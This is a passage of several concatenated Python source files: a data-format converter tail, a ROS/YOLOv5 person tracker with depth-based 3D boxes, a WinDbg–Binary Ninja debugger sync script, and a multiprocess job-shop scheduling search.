def pop_html_img(x):
if not isinstance(x, str):
return x
if not (x.endswith('.png') or x.endswith('.jpg')):
return x
base, name = os.path.split(x)
if os.path.isfile(name):
full_path = False
elif os.path.isfile(x):
full_path = True
else:
return x
content = f'''<a href="{x if full_path else name}" onmouseover="showPopup(this, '{x if full_path else name}')" onmouseout="hidePopup()">{name if len(name) < 15 else "Image"}</a> <div id="popup"> </div></td>'''
return content
data = pd.read_csv(infile).applymap(pop_html_img)
with open(outfile, 'w') as f:
f.write(TABLE_HEADER + data.to_html(justify='center', escape=False))
def source_dirs(dirs):
import sys, os, glob
reserved = ['__builtins__', '__cached__', '__doc__', '__file__', '__loader__', '__name__', '__package__', '__spec__']
functions = list()
for item in dirs:
item = os.path.abspath(os.path.expanduser(item))
sys.path.append(item)
for module in glob.glob(f'{item}/*.py'):
m = __import__(os.path.basename(module)[:-3])
for i in dir(m):
if not i in reserved:
functions.append((i, getattr(m,i)))
return functions
def load_io_db(fn, sequence_id=None, module=None):
import pickle
data = pickle.load(open(fn, 'rb'))
return data[sequence_id][module] if sequence_id and module else data
def main():
import os, sys, pickle
if len(sys.argv) < 3:
sys.exit(0)
# Input is pkl, output is rds
infile = sys.argv[1]
outfile = sys.argv[2]
if '-f' in sys.argv:
try:
os.remove(outfile)
except Exception:
pass
if not os.path.isfile(outfile):
if infile.endswith('.pkl') and outfile.endswith('.rds'):
save_rds(pickle.load(open(infile, 'rb')), outfile)
elif infile.endswith('.rds') and outfile.endswith('.pkl'):
pickle.dump(load_rds(infile), open(outfile, 'wb'))
elif infile.endswith('.csv') and outfile.endswith('.html'):
csv_to_html(infile, outfile)
else:
sys.exit(1)
return 0
if __name__ == '__main__':
import warnings
from rpy2.rinterface import RRuntimeWarning
with warnings.catch_warnings():
warnings.filterwarnings("ignore", category=RRuntimeWarning)
main()
|
watchout_1.0.py
|
import sys
sys.path.insert(0, './yolov5')
from yolov5.utils.datasets import LoadImages, LoadStreams,LoadWebcam,LoadRealsense
from yolov5.utils.general import check_img_size, non_max_suppression, scale_coords
from yolov5.utils.torch_utils import select_device, time_synchronized
from deep_sort_pytorch.utils.parser import get_config
from deep_sort_pytorch.deep_sort import DeepSort
import argparse
import os
import platform
import shutil
import time
from pathlib import Path
import cv2
import torch
import torch.backends.cudnn as cudnn
import numpy as np
from visualization_msgs.msg import Marker,MarkerArray
import rospy
from geometry_msgs.msg import Point
from numba import jit
'''
该文件修改了原来的track.py,并加入了
- 深度计算
- maker显示
version:1.0
'''
palette = (2 ** 11 - 1, 2 ** 15 - 1, 2 ** 20 - 1)
def bbox_rel(*xyxy):
"""" Calculates the relative bounding box from absolute pixel values. """
bbox_left = min([xyxy[0].item(), xyxy[2].item()])
bbox_top = min([xyxy[1].item(), xyxy[3].item()])
bbox_w = abs(xyxy[0].item() - xyxy[2].item())
bbox_h = abs(xyxy[1].item() - xyxy[3].item())
x_c = (bbox_left + bbox_w / 2)
y_c = (bbox_top + bbox_h / 2)
w = bbox_w
h = bbox_h
return x_c, y_c, w, h
def compute_color_for_labels(label):
"""
Simple function that adds fixed color depending on the class
"""
color = [int((p * (label ** 2 - label + 1)) % 255) for p in palette]
return tuple(color)
def showdepth(boxes,depth):
for box in boxes:
x1,y1,x2,y2 = [int(i) for i in box]
for u in range(x1,x2):
for v in range(y1,y2):
print(depth[v,u]*0.001)
#注意 offset 光心偏移
def draw_boxes(img, bbox, identities=None, offset=(0, 0)):
for i, box in enumerate(bbox):
x1, y1, x2, y2 = [int(i) for i in box]
x1 += offset[0]
x2 += offset[0]
y1 += offset[1]
y2 += offset[1]
#import math
#x1 = x1 + math.ceil((x2-x1)*0.382)
#x2 = x1 + math.ceil((x2-x1)*0.618)
#y1 = y1 + math.ceil((y2-y1)*0.382)
#y2 = y1 + math.ceil((y2-y1)*0.618)
# print(img.shape)
# print(x1,y1,x2,y2)
# # box text and bar
id = int(identities[i]) if identities is not None else 0
color = compute_color_for_labels(id)
label = '{}{:d}'.format("", id)
t_size = cv2.getTextSize(label, cv2.FONT_HERSHEY_PLAIN, 2, 2)[0]
cv2.rectangle(img, (x1, y1), (x2, y2), color, 3)
cv2.rectangle(
img, (x1, y1), (x1 + t_size[0] + 3, y1 + t_size[1] + 4), color, -1)
cv2.putText(img, label, (x1, y1 +
t_size[1] + 4), cv2.FONT_HERSHEY_PLAIN, 2, [255, 255, 255], 2)
return img
class Watchout:
def __init__(self):
self.lasttime = rospy.Time.now()
self.thistime = rospy.Time.now()
self.scale = 0.001
self.idcenvel = [] #id cx,cy,vx,vy
self.depth_thres = 10.0 #深度阀值
# 内参
fx = 609.2713012695312
cx = 316.67022705078125
fy = 608.010498046875
cy = 244.8178253173828
self.K = np.array([[1.0/fx,0,-cx/fx],
[0,1.0/fy,-cy/fy],
[0.0 , 0.0, 1.0]])
self.lines = [[0,1],[1,3],[3,2],[2,0],
[0,4],[2,6],[1,5],[3,7],
[4,5],[5,7],[7,6],[6,4]]
self.pub = rospy.Publisher('Personbox',MarkerArray,queue_size=1)
self.rate = rospy.Rate(10)
def watch(self,opt, save_img=False):
out, source,weights, view_img, save_txt, imgsz = \
opt.output, opt.source ,opt.weights, opt.view_img, opt.save_txt, opt.img_size
# initialize deepsort
cfg = get_config()
cfg.merge_from_file(opt.config_deepsort)
deepsort = DeepSort(cfg.DEEPSORT.REID_CKPT,
max_dist=cfg.DEEPSORT.MAX_DIST, min_confidence=cfg.DEEPSORT.MIN_CONFIDENCE,
nms_max_overlap=cfg.DEEPSORT.NMS_MAX_OVERLAP, max_iou_distance=cfg.DEEPSORT.MAX_IOU_DISTANCE,
max_age=cfg.DEEPSORT.MAX_AGE, n_init=cfg.DEEPSORT.N_INIT, nn_budget=cfg.DEEPSORT.NN_BUDGET,
use_cuda=True)
# Initialize
device = select_device(opt.device)
half = device.type != 'cpu' # half precision only supported on CUDA
# Load model
model = torch.load(weights, map_location=device)[
'model'].float() # load to FP32
model.to(device).eval()
if half:
model.half() # to FP16
# Set Dataloader
vid_path, vid_writer = None, None
view_img = True
cudnn.benchmark = True # set True to speed up constant image size inference
dataset = LoadRealsense('0',img_size=imgsz)
# Get names and colors
names = model.module.names if hasattr(model, 'module') else model.names
# Run inference
t0 = time.time()
img = torch.zeros((1, 3, imgsz, imgsz), device=device) # init img
# run once
_ = model(img.half() if half else img) if device.type != 'cpu' else None
for frame_idx, (path, img, im0, depth) in enumerate(dataset):
t4 = time.time()
self.thistime = rospy.Time.now()
img = torch.from_numpy(img).to(device)
img = img.half() if half else img.float() # uint8 to fp16/32
img /= 255.0 # 0 - 255 to 0.0 - 1.0
if img.ndimension() == 3:
img = img.unsqueeze(0)
# Inference
t1 = time_synchronized()
pred = model(img, augment=opt.augment)[0]
# Apply NMS
# [xyxy, conf, cls] n*6
pred = non_max_suppression(
pred, opt.conf_thres, opt.iou_thres, classes=opt.classes, agnostic=opt.agnostic_nms)
t2 = time_synchronized()
# Print time (inference + NMS)
print('Done. (%.3fs)' % ( t2 - t1))
# Process detections
for i, det in enumerate(pred): # detections per image
im0 = im0.copy()
if det is not None and len(det):
# Rescale boxes from img_size to im0 size 即处理 xyxy
det[:, :4] = scale_coords(
img.shape[2:], det[:, :4], im0.shape).round()
bbox_xywh = []
confs = []
# Adapt detections to deep sort input format
# deepsort的输入类型为 centerx,centery,w,h,confidence,
for *xyxy, conf, cls in det:
x_c, y_c, bbox_w, bbox_h = bbox_rel(*xyxy)
obj = [x_c, y_c, bbox_w, bbox_h]
bbox_xywh.append(obj)
confs.append([conf.item()])
xywhs = torch.Tensor(bbox_xywh)
confss = torch.Tensor(confs)
# Pass detections to deepsort
# outputs : x1 y1 x2 y2 id
outputs = deepsort.update(xywhs, confss, im0)
# draw boxes for visualization
if len(outputs) > 0:
bbox_xyxy = outputs[:, :4]
identities = outputs[:, -1]
draw_boxes(im0, bbox_xyxy, identities)
t3 = rospy.Time.now()
#self.publish3dbox(depth,bbox_xyxy,identities)
# if not self.init:
# import threading
# thread = threading.Thread(target=self.publish3dbox,args=(depth,bbox_xyxy,identities))
# thread.start()
# self.init = 1
# print('开启成功')
print(f'Creating markderarrary use {(rospy.Time.now()-t3).to_sec()} s ')
else:
deepsort.increment_ages()
# Stream results
if view_img:
cv2.imshow('watchout', im0)
if cv2.waitKey(1) == ord('q') or rospy.is_shutdown(): # q to quit
# thread.join()
print('Done. (%.3fs)' % (time.time() - t0))
raise StopIteration
self.lasttime = self.thistime
t5 = time.time()
print('t5-t4',t5-t4)
# @jit
def create_box(self,depth_img,box,offset=(0,0)):
# 计算公式 x = (u*depth - cx*depth)/fx y = (v*depth - cy*depth)/fy
# 先将 像素坐标 uv1 * depth
x1,y1,x2,y2 = [int(i) for i in box]
w = x2 - x1
h = y2 - y1
#黄金比例切割背景
import math
u1 = math.ceil(x1+0.382*w)
u2 = math.ceil(x1+0.618*w)
v1 = math.ceil(y1+0.382*h)
v2 = math.ceil(y1+0.618*h)
uv1 = []
for u in range(u1,u2):
for v in range(v1,v2):
depth = float(depth_img[v,u])*self.scale
if depth > self.depth_thres:
continue
else:
uv1.append([u*depth,v*depth,depth])
if(len(uv1)<1):
print("create_error")
return 0,0,None
# 3*n
uvd = np.array(uv1).T
# 将 uvd * 相机内参矩阵 K 转化为相机坐标的 xyz 但 相机坐标的 xyz 对应着三维空间中的 yzx
# n*3
yzx = self.K.dot(uvd).T
# 用均值代替质心
cx = yzx[:,2].mean()
cy = yzx[:,0].mean()
# 找到八个顶点
xmax = yzx[:,2].max()
xmin = yzx[:,2].min()
ymax = yzx[:,0].max()
ymin = yzx[:,0].min()
zmax = yzx[:,1].max()
zmin = yzx[:,1].min()
points = [Point(xmin,ymin,zmin),Point(xmax,ymin,zmin),
Point(xmin,ymax,zmin),Point(xmax,ymax,zmin),
Point(xmin,ymin,zmax),Point(xmax,ymin,zmax),
Point(xmin,ymax,zmax),Point(xmax,ymax,zmax)]
# 创建 bbox
marker = Marker()
marker.header.frame_id = 'map'
marker.header.stamp = rospy.Time.now()
marker.action = Marker.ADD
marker.type = Marker.LINE_LIST
# marker.lifetime = rospy.Duration(0)
marker.color.r = 1
marker.color.g = 0
marker.color.b = 0
marker.color.a = 1
marker.scale.x = 0.2
marker.points = []
for line in self.lines:
marker.points.append(points[line[0]])
marker.points.append(points[line[1]])
return cx , cy , marker
# @jit
def publish3dbox(self,depth_img,bbox,identities=None,offset=(0,0)):
markerarray = MarkerArray()
dt = (self.thistime - self.lasttime).to_sec()
idcentvel_tmp = []
# 生成markerarray 并 进行匹配计算 idcentvel
for i,id_ in enumerate(identities):
marker = Marker()
cx,cy,marker = self.create_box(depth_img,bbox[i],offset)
marker.id = id_
markerarray.markers.append(marker)
flag = 0
# 妙处:初始化时是空列表,同时完成了第一次时间的初始化
for idcv in self.idcenvel:
if id_ == idcv[0]:
vx = (cx - idcv[1])/dt
vy = (cy - idcv[2])/dt
idcentvel_tmp.append([id_,cx,cy,vx,vy])
flag = 1
break
if not flag:
vx=vy=0.0
idcentvel_tmp.append([id_,cx,cy,vx,vy])
self.idcenvel = idcentvel_tmp
print('idcenvel',self.idcenvel)
self.pub.publish(markerarray)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--weights', type=str,
default='yolov5/weights/yolov5s.pt', help='model.pt path')
# file/folder, 0 for webcam
parser.add_argument('--source', type=str,
default='inference/images', help='source')
parser.add_argument('--output', type=str, default='inference/output',
help='output folder') # output folder
parser.add_argument('--img-size', type=int, default=640,
help='inference size (pixels)')
parser.add_argument('--conf-thres', type=float,
default=0.4, help='object confidence threshold')
parser.add_argument('--iou-thres', type=float,
default=0.5, help='IOU threshold for NMS')
parser.add_argument('--fourcc', type=str, default='mp4v',
help='output video codec (verify ffmpeg support)')
parser.add_argument('--device', default='',
help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
parser.add_argument('--view-img', action='store_true',
help='display results')
parser.add_argument('--save-txt', action='store_true',
help='save results to *.txt')
# class 0 is person
parser.add_argument('--classes', nargs='+', type=int,
default=[0], help='filter by class')
parser.add_argument('--agnostic-nms', action='store_true',
help='class-agnostic NMS')
parser.add_argument('--augment', action='store_true',
help='augmented inference')
parser.add_argument("--config_deepsort", type=str,
default="deep_sort_pytorch/configs/deep_sort.yaml")
args = parser.parse_args()
args.img_size = check_img_size(args.img_size)
print(args)
rospy.init_node('watchout')
watchout = Watchout()
with torch.no_grad():
watchout.watch(args)
|
windbg.py
|
from multiprocessing.connection import Listener
from pykd import *
import os
import re
import string
import sys
import threading
import time
poll_time = .25
conn = None
base = module.begin(getModulesList()[0])
bps = { }
ip = None
def start(pipe):
global conn
listener = Listener('\\\\.\\pipe\\' + pipe, backlog=0)
while True:
conn = listener.accept()
print("Connected to Binary Ninja")
event_loop(conn)
def stop(conn, reason):
conn.close()
print(reason)
def send(command, **params):
global conn
try:
conn.send((command, params))
except IOError:
return stop(conn, "Lost connection to Binary Ninja")
def event_loop(conn):
global bps
global ip
while True:
try:
if conn.poll(poll_time):
if (getExecutionStatus() == executionStatus.Go):
breakin() # COM returns before execution is stopped(?)
time.sleep(.1) # quick sleep fixes it
continue_executing = process(conn.recv())
if continue_executing:
go()
else:
process(conn.recv())
if (getExecutionStatus() == executionStatus.Go):
continue
# check if IP has changed
current_ip = getIP()
if (current_ip != ip):
update_ip(current_ip)
update_vtable(current_ip)
# check for breakpoints added or removed through windbg
if getNumberBreakpoints() != len(bps):
update_bps()
except IOError:
return stop(conn, "Lost connection to Binary Ninja")
except DbgException as e:
print(e)
send('print', message=str(e) + '. Try again - pykd is finicky')
def process(data):
print(data)
global bps
cmd, params = data
if 'bp' in cmd:
addr = params['addr'] + base
if cmd == 'set_bp' and addr not in bps:
# set unresolved BP (b/c ASLR)
dbgCommand('bu ' + findSymbol(addr, True))
# retrieve and save the BP we just created
bp = get_bp(addr)
bps[addr] = bp
elif cmd == 'delete_bp' and addr in bps:
breakpoint.remove(bps[addr])
del bps[addr]
elif cmd == 'set_ip':
setIP(params['ip'] + base)
elif cmd == 'sync':
send('set_ip', ip=getIP()-base, regs=get_regs())
for bp in bps:
send('set_bp', addr=bp-base)
elif cmd == 'go':
go()
elif cmd == 'break':
breakin()
return False # pause execution
elif cmd == 'step_out':
dbgCommand('pt; p') # stepout() is weird
elif cmd == 'step_in':
trace()
elif cmd == 'step_over':
step()
elif cmd == 'run_to':
addr = params['addr'] + base
# because 'pa' throws exception and won't run for some reason
dbgCommand('bu ' + findSymbol(addr, True))
go()
breakpoint.remove(get_bp(addr))
return True # continue executing
def update_ip(current_ip):
global bps
global ip
ip = current_ip
if current_ip not in bps:
send('set_ip', ip=current_ip-base, regs=get_regs())
else:
send('bp_hit', addr=current_ip-base, regs=get_regs())
def update_vtable(current_ip):
# matches symbols, e.g. {Symbol!ExampleSymbol (73b43420)}
symbol_regex = r"\{([^()]*|\([^()]*\))*\}"
# matches dereferences, e.g. [eax+30h]
deref_regex = r"\[[^\[]*\]"
# matches arithmetic in dereferences
arith_regex = r"([+-/*])"
asm = disasm.instruction(disasm(current_ip))
instr = asm.split()[2]
ptr_target = None
find_object_type = False
ptr_object = None
object = None
if instr == 'call' and re.search(symbol_regex, asm):
# target addr is between parentheses in WinDbg disasm
addr = asm[asm.find("(")+1:asm.find(")")]
if asm.find(addr+"={") != -1:
return # addr is an import
target = long(addr, 16)
elif instr == 'mov' and 'ptr' in asm.split(',')[1]:
find_object_type = True
if re.search(symbol_regex, asm):
# target has already been dereferenced by WinDbg
target = long(asm[asm.find("(")+1:asm.find(")")], 16)
else:
ptr_target = long(asm.split("=")[1], 16)
elif instr == 'lea' and re.search(deref_regex, asm):
find_object_type = True
# target (e.g. esi+30h) is between brackets in WinDbg disasm
reg_and_arith = asm[asm.find("[")+1:asm.find("]")]
# although lea doesn't actually deref memory, do it anyway
# to get a symbol, then can mark it as a pointer in binja
ptr_target = expr(reg_and_arith, False)
else:
# this is not a valid vtable reference
return
# attempt to determine type of the object where the vtable's coming from
# warning: this is not always accurate (e.g. may determine it's an object
# of type Parent when it's really of type Child)
if find_object_type:
reg_and_arith = asm[asm.find("[")+1:asm.find("]")]
if '!' in reg_and_arith: # symbol
if '+' in reg_and_arith: # symbol with offset
# remove the offset and evaluate to get object address
symbol = reg_and_arith.split('+')[0]
ptr_object = expr(symbol, False)
else:
# no offset, so just extract the address provided by WinDbg
addr = reg_and_arith[reg_and_arith.find("(")+1:reg_and_arith.find(")")]
ptr_object = long(addr, 16)
elif re.search(arith_regex, reg_and_arith):
reg_name = re.split(arith_regex, reg_and_arith)[0]
ptr_object = reg(reg_name)
elif all(char in string.hexdigits for char in reg_and_arith):
ptr_object = long(reg_and_arith.strip('h'), 16)
elif reg_and_arith.isalpha():
reg_name = reg_and_arith
ptr_object = reg(reg_name)
if ptr_target is not None:
if not isValid(ptr_target):
return
target = ptrPtr(ptr_target)
if ptr_object is not None and isValid(ptr_object):
object = ptrPtr(ptr_object)
if isValid(target):
if find_object_type and object is not None:
send('vtable', instr=instr, target=target-base, object=object-base, ip=current_ip-base)
else:
send('vtable', instr=instr, target=target-base, ip=current_ip-base)
def update_bps():
global bps
current_bps = []
for index in range(0, getNumberBreakpoints()):
bp = getBp(index)
addr = breakpoint.getOffset(bp)
current_bps.append(addr)
# check for BPs added in WinDbg
if addr not in bps:
bps[addr] = bp
send('set_bp', addr=addr-base)
# check for BPs removed in WinDbg
for addr in bps.copy():
if addr not in current_bps:
del bps[addr]
send('delete_bp', addr=addr-base)
def get_bp(addr):
for index in range(0, getNumberBreakpoints()):
bp = getBp(index)
if breakpoint.getOffset(bp) == addr:
return bp
def get_regs():
regs = { }
# TODO limited set of registers due to pykd errors
reg_names = [getRegisterName(i) for i in range(0, getNumberRegisters())
if not any(char.isdigit() for char in getRegisterName(i))]
for name in reg_names:
regs[name] = reg(name)
return regs
pipe = sys.argv[1]
t = threading.Thread(target=start, args=[pipe])
t.setDaemon(True)
t.start()
|
solution.py
|
import time
import random
from collections import defaultdict
import numpy as np
import copy
import multiprocessing
def process_generate_scratch(schedule_agent, cur_time, job_status, machine_status, coeff_tardiness, makespan_dict, data_ct_dict):
makespan, op_seq_machines, job_seq_machines, start_time_op_macs, end_time_op_macs, start_time_ops, end_time_ops, mac_assignment_ops, flag_scheduled_ops, flag_scheduled_jobs = schedule_agent.generation_scratch(cur_time, job_status, machine_status, coeff_tardiness, 0)
for ind_job_check in range(schedule_agent.num_job):
name_job_check = schedule_agent.name_jobs[ind_job_check]
type_job_check = schedule_agent.type_jobs[ind_job_check]
priority_job_check = job_status[name_job_check]['priority']
num_op_job_check = int( schedule_agent.num_op_jobs[ind_job_check] )
idx_first_op_job_check = schedule_agent.idx_first_op_jobs[ind_job_check]
for ind_op_job_check in range(num_op_job_check):
op_check = int( idx_first_op_job_check + ind_op_job_check )
if priority_job_check > 0:
pending_constraint_op = schedule_agent.job_types[type_job_check][ind_op_job_check]['max_pend_time']
time_comp = -1
if ind_op_job_check == 0:
time_comp = schedule_agent.arrival_time_jobs[ind_job_check]
if time_comp < 0:
print('wrong arrival time')
# if time_comp <= 0:
else: # not the first operation of this job
time_comp = end_time_ops[op_check - 1]
# if ind_op_job_check == 0:
if start_time_ops[op_check] - time_comp > pending_constraint_op:
print('violate the pending contraint')
makespan = makespan + 99999
# penalty_pending_constraint = penalty_pending_constraint + priority_job_check * 10 * (schedule_agent.start_time_ops[op_check] - time_comp - pending_constraint_op)
# if end_time_ops[op_check] - time_comp >= pending_constraint_op:
# if job_status[name_job_check]['priority'] > 0:
# for ind_op_job_check in range(num_op_job_check):
# for ind_job_check in range(self.num_job):
makespan_dict[coeff_tardiness] = makespan
data_ct_dict[coeff_tardiness] = [op_seq_machines, job_seq_machines, start_time_op_macs, end_time_op_macs, start_time_ops, end_time_ops, mac_assignment_ops, flag_scheduled_ops, flag_scheduled_jobs]
# def process_generate_scratch(schedule_agent, cur_time, job_status, machine_status, coeff_tardiness, makespan_dict):
def process_generate_resume(schedule_agent, cur_time, job_status, machine_status, coeff_tardiness, makespan_dict, data_ct_dict):
makespan, new_op_seq_machines, new_job_seq_machines, new_start_time_op_macs, new_end_time_op_macs, new_start_time_ops, new_end_time_ops, new_mac_assignment_ops, new_flag_scheduled_ops, count_scheduled_op_macs, new_flag_scheduled_jobs = schedule_agent.generation_resume(cur_time, job_status, machine_status, coeff_tardiness, 0)
for ind_job_check in range(schedule_agent.num_job):
name_job_check = schedule_agent.name_jobs[ind_job_check]
type_job_check = schedule_agent.type_jobs[ind_job_check]
priority_job_check = job_status[name_job_check]['priority']
num_op_job_check = int( schedule_agent.num_op_jobs[ind_job_check] )
idx_first_op_job_check = schedule_agent.idx_first_op_jobs[ind_job_check]
for ind_op_job_check in range(num_op_job_check):
op_check = int( idx_first_op_job_check + ind_op_job_check )
if priority_job_check > 0:
pending_constraint_op = schedule_agent.job_types[type_job_check][ind_op_job_check]['max_pend_time']
time_comp = -1
if ind_op_job_check == 0:
time_comp = schedule_agent.arrival_time_jobs[ind_job_check]
if time_comp < 0:
print('wrong arrival time')
# if time_comp <= 0:
else: # not the first operation of this job
time_comp = new_end_time_ops[op_check - 1]
# if ind_op_job_check == 0:
if new_start_time_ops[op_check] - time_comp > pending_constraint_op:
print('violate the pending contraint')
makespan = makespan + 99999
# penalty_pending_constraint = penalty_pending_constraint + priority_job_check * 10 * (schedule_agent.start_time_ops[op_check] - time_comp - pending_constraint_op)
# if end_time_ops[op_check] - time_comp >= pending_constraint_op:
# if job_status[name_job_check]['priority'] > 0:
# for ind_op_job_check in range(num_op_job_check):
# for ind_job_check in range(self.num_job):
makespan_dict[coeff_tardiness] = makespan
data_ct_dict[coeff_tardiness] = [new_op_seq_machines, new_job_seq_machines, new_start_time_op_macs, new_end_time_op_macs, new_start_time_ops, new_end_time_ops, new_mac_assignment_ops, new_flag_scheduled_ops, count_scheduled_op_macs, new_flag_scheduled_jobs]
# def process_generate_scratch(schedule_agent, cur_time, job_status, machine_status, coeff_tardiness, makespan_dict):
def process_iteration_scratch(schedule_agent, ind_process, cur_time, job_status, machine_status, coeff_tardiness, makespan_comp, makespan_dict, data_ct_dict):
makespan_min = makespan_comp
op_seq_machines_min = None
job_seq_machines_min = None
start_time_op_macs_min = None
end_time_op_macs_min = None
start_time_ops_min = None
end_time_ops_min = None
mac_assignment_ops_min = None
flag_scheduled_ops_min = None
flag_scheduled_jobs_min = None
start_time_iter = time.time()
elapsed_time_iter = 0
while elapsed_time_iter < 12: # for ind_iter in range(7):
makespan, op_seq_machines, job_seq_machines, start_time_op_macs, end_time_op_macs, start_time_ops, end_time_ops, mac_assignment_ops, flag_scheduled_ops, flag_scheduled_jobs = schedule_agent.generation_scratch(cur_time, job_status, machine_status, coeff_tardiness, 1)
if makespan_min == -1 or makespan < makespan_min:
for ind_job_check in range(schedule_agent.num_job):
name_job_check = schedule_agent.name_jobs[ind_job_check]
type_job_check = schedule_agent.type_jobs[ind_job_check]
priority_job_check = job_status[name_job_check]['priority']
# if schedule_agent.flag_scheduled_jobs[ind_job_check] != 1:
# print('unscheduled job')
# # if flag_scheduled_jobs[flag_scheduled_jobs] != 0:
num_op_job_check = int( schedule_agent.num_op_jobs[ind_job_check] )
idx_first_op_job_check = schedule_agent.idx_first_op_jobs[ind_job_check]
for ind_op_job_check in range(num_op_job_check):
op_check = int( idx_first_op_job_check + ind_op_job_check )
# if self.flag_scheduled_ops[op_check] != 1:
# print('unscheduled_ operation')
# # if flag_scheduled_ops[idx_first_op_job_check + ind_op_job_check] != 1:
# if ind_op_job_check > 0:
# if self.end_time_ops[op_check - 1] > self.start_time_ops[op_check]:
# print('incorrect start time')
# # if end_time_ops[op_check - 1] > start_time_ops[op_check]:
# # if ind_op_job_check > 0:
if priority_job_check > 0:
pending_constraint_op = schedule_agent.job_types[type_job_check][ind_op_job_check]['max_pend_time']
time_comp = -1
if ind_op_job_check == 0:
time_comp = schedule_agent.arrival_time_jobs[ind_job_check]
if time_comp < 0:
print('wrong arrival time')
# if time_comp <= 0:
else: # not the first operation of this job
time_comp = end_time_ops[op_check - 1]
# if ind_op_job_check == 0:
if start_time_ops[op_check] - time_comp > pending_constraint_op:
print('violate the pending contraint')
makespan = makespan + 99999
# penalty_pending_constraint = penalty_pending_constraint + priority_job_check * 10 * (schedule_agent.start_time_ops[op_check] - time_comp - pending_constraint_op)
# if end_time_ops[op_check] - time_comp >= pending_constraint_op:
# if job_status[name_job_check]['priority'] > 0:
# for ind_op_job_check in range(num_op_job_check):
# for ind_job_check in range(self.num_job):
if makespan < makespan_min:
makespan_min = makespan
op_seq_machines_min = copy.deepcopy(op_seq_machines)
job_seq_machines_min = copy.deepcopy(job_seq_machines)
start_time_op_macs_min = copy.deepcopy(start_time_op_macs)
end_time_op_macs_min = copy.deepcopy(end_time_op_macs)
start_time_ops_min = copy.deepcopy(start_time_ops)
end_time_ops_min = copy.deepcopy(end_time_ops)
mac_assignment_ops_min = copy.deepcopy(mac_assignment_ops)
flag_scheduled_ops_min = copy.deepcopy(flag_scheduled_ops)
flag_scheduled_jobs_min = copy.deepcopy(flag_scheduled_jobs)
# makespan < makespan_min:
# if makespan_min == -1 or makespan < makespan_min:
elapsed_time_iter = time.time() - start_time_iter
# while elapsed_time_iter < 14:
makespan_dict[ind_process] = makespan_min
data_ct_dict[ind_process] = [op_seq_machines_min, job_seq_machines_min, start_time_op_macs_min, end_time_op_macs_min, start_time_ops_min, end_time_ops_min, mac_assignment_ops_min, flag_scheduled_ops_min, flag_scheduled_jobs_min]
# def process_iteration_scratch(schedule_agent, cur_time, job_status, machine_status, coeff_tardiness, makespan_dict, data_ct_dict):
def process_iteration_resume(schedule_agent, ind_process, cur_time, job_status, machine_status, coeff_tardiness, makespan_comp, makespan_dict, data_dict):
makespan_min = makespan_comp
op_seq_machines_min = None
job_seq_machines_min = None
start_time_op_macs_min = None
end_time_op_macs_min = None
start_time_ops_min = None
end_time_ops_min = None
mac_assignment_ops_min = None
flag_scheduled_ops_min = None
count_scheduled_op_macs_min = None
flag_scheduled_jobs_min = None
start_time_iter = time.time()
elapsed_time_iter = 0
while elapsed_time_iter < 12: # for ind_iter in range(8):
makespan, new_op_seq_machines, new_job_seq_machines, new_start_time_op_macs, new_end_time_op_macs, new_start_time_ops, new_end_time_ops, new_mac_assignment_ops, new_flag_scheduled_ops, count_scheduled_op_macs, new_flag_scheduled_jobs = schedule_agent.generation_resume(cur_time, job_status, machine_status, coeff_tardiness, 1)
# makespan, op_seq_machines, job_seq_machines, start_time_op_macs, end_time_op_macs, start_time_ops, end_time_ops, mac_assignment_ops, flag_scheduled_ops, flag_scheduled_jobs = schedule_agent.generation_scratch(cur_time, job_status, machine_status, coeff_tardiness, 1)
if makespan_min == -1 or makespan < makespan_min:
for ind_job_check in range(schedule_agent.num_job):
name_job_check = schedule_agent.name_jobs[ind_job_check]
type_job_check = schedule_agent.type_jobs[ind_job_check]
priority_job_check = job_status[name_job_check]['priority']
# if schedule_agent.flag_scheduled_jobs[ind_job_check] != 1:
# print('unscheduled job')
# # if flag_scheduled_jobs[flag_scheduled_jobs] != 0:
num_op_job_check = int( schedule_agent.num_op_jobs[ind_job_check] )
idx_first_op_job_check = schedule_agent.idx_first_op_jobs[ind_job_check]
for ind_op_job_check in range(num_op_job_check):
op_check = int( idx_first_op_job_check + ind_op_job_check )
# if self.flag_scheduled_ops[op_check] != 1:
# print('unscheduled_ operation')
# # if flag_scheduled_ops[idx_first_op_job_check + ind_op_job_check] != 1:
# if ind_op_job_check > 0:
# if self.end_time_ops[op_check - 1] > self.start_time_ops[op_check]:
# print('incorrect start time')
# # if end_time_ops[op_check - 1] > start_time_ops[op_check]:
# # if ind_op_job_check > 0:
if priority_job_check > 0:
pending_constraint_op = schedule_agent.job_types[type_job_check][ind_op_job_check]['max_pend_time']
time_comp = -1
if ind_op_job_check == 0:
time_comp = schedule_agent.arrival_time_jobs[ind_job_check]
if time_comp < 0:
print('wrong arrival time')
# if time_comp <= 0:
else: # not the first operation of this job
time_comp = new_end_time_ops[op_check - 1]
# if ind_op_job_check == 0:
if new_start_time_ops[op_check] - time_comp > pending_constraint_op:
print('violate the pending contraint')
makespan = makespan + 99999
# penalty_pending_constraint = penalty_pending_constraint + priority_job_check * 10 * (schedule_agent.start_time_ops[op_check] - time_comp - pending_constraint_op)
# if end_time_ops[op_check] - time_comp >= pending_constraint_op:
# if job_status[name_job_check]['priority'] > 0:
# for ind_op_job_check in range(num_op_job_check):
# for ind_job_check in range(self.num_job):
if makespan < makespan_min:
makespan_min = makespan
op_seq_machines_min = copy.deepcopy(new_op_seq_machines)
job_seq_machines_min = copy.deepcopy(new_job_seq_machines)
start_time_op_macs_min = copy.deepcopy(new_start_time_op_macs)
end_time_op_macs_min = copy.deepcopy(new_end_time_op_macs)
start_time_ops_min = copy.deepcopy(new_start_time_ops)
end_time_ops_min = copy.deepcopy(new_end_time_ops)
mac_assignment_ops_min = copy.deepcopy(new_mac_assignment_ops)
flag_scheduled_ops_min = copy.deepcopy(new_flag_scheduled_ops)
count_scheduled_op_macs_min = copy.deepcopy(count_scheduled_op_macs)
flag_scheduled_jobs_min = copy.deepcopy(new_flag_scheduled_jobs)
# if makespan < makespan_min:
# if makespan_min == -1 or makespan < makespan_min:
elapsed_time_iter = time.time() - start_time_iter
# while elapsed_time_iter < 13:
makespan_dict[ind_process] = makespan_min
data_dict[ind_process] = [op_seq_machines_min, job_seq_machines_min, start_time_op_macs_min, end_time_op_macs_min, start_time_ops_min, end_time_ops_min, mac_assignment_ops_min, flag_scheduled_ops_min, count_scheduled_op_macs_min, flag_scheduled_jobs_min]
# def process_iteration_scratch(schedule_agent, cur_time, job_status, machine_status, coeff_tardiness, makespan_dict, data_ct_dict):
class Trainer:
